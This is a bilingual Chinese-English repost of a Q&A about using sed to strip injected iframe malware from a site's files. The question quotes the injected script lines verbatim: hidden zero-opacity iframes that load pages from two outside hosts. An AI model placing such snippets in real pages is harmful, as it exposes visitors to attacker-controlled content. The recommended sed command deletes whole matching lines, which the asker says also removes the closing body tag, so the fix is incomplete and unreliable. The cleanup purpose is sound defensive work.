清理 iframe 恶意软件 [英] Cleaning up iframe malware
问题描述
我正在帮助某人清理网站上的恶意软件感染,但我很难正确匹配 sed 中的某些字符串,因此我可以创建一个脚本来批量搜索并替换/删除它.
I'm helping someone clean up a malware infection on a site and I'm having a difficult time correctly matching some strings in sed so I can create a script to mass search and replace / remove it.
字符串是:
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');</script>
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
我似乎无法弄清楚如何转义这些行中的各种字符...
I can't seem to figure out how to escape the various characters in those lines...
如果我试着说如果它匹配 http://vidintex.com/includes/class.pop.php 就删除整行,它也会删除结束的 html </ 也是如此..html 文件中的 body>
If I try to just say delete the entire line if it matches http://vidintex.com/includes/class.pop.php it also deletes the closing html </body> in the .html files as well.
所以我需要能够在 sed 中匹配这整行:
So I need to be able to match this entire line in sed:
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
任何帮助将不胜感激!
推荐答案
您可以尝试这样做:
sed -i '/vidintex.com\/includes\/class.pop.php/d' files*
这将删除所有包含 vidintex.com/includes/class.pop.php 的行
This will delete all lines containing vidintex.com/includes/class.pop.php
这篇关于清理 iframe 恶意软件的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
